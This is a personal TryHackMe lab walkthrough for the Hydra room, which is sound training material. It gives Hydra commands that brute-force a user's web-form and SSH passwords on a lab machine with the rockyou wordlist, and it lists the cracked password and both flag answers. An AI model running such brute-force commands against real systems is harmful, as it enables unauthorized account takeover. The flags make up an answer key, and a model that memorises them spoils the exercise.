This is my TryHackMe walkthrough, created to document my learning journey and share solutions with the community. The writeups include a mix of hints, step-by-step explanations, and final answers to help players who get stuck, while still encouraging independent problem-solving.
Hydra Room - Learn about and use Hydra, a fast network logon cracker, to bruteforce and obtain a website’s credentials.
Overview
- Room URL: https://tryhackme.com/room/hydra
- Difficulty: Easy
- Time to complete: 45
Walkthrough
1. Hydra Introduction
No hints needed!
2. Using Hydra
Use Hydra to bruteforce molly's web password. What is flag 1?
Start the machine and visit the website via MACHINE IP
- Open the browser DevTools and, in the Network tab, try logging in: there is a POST request to http://<MACHINE_IP>/login
- Now that we know the path, we can brute-force the password
hydra -l molly -P /usr/share/wordlists/rockyou.txt <MACHINE_IP> http-post-form "/login:username=^USER^&password=^PASS^:F=Incorrect" -V
- We got the password sunshine, log in as molly and get the flag
=> Answer: THM{2673a7dd116de68e85c48ec0b1f2612e}
Use Hydra to bruteforce molly's SSH password. What is flag 2?
Do the same with ssh to get the password and gain access
hydra -l molly -P /usr/share/wordlists/rockyou.txt <MACHINE_IP> -t 4 ssh
- Now that we have the password, SSH to the server and get the flag
ssh molly@<MACHINE_IP>
cat flag2.txt
=> Answer: THM{c8eeb0468febbadea859baeb33b2541b}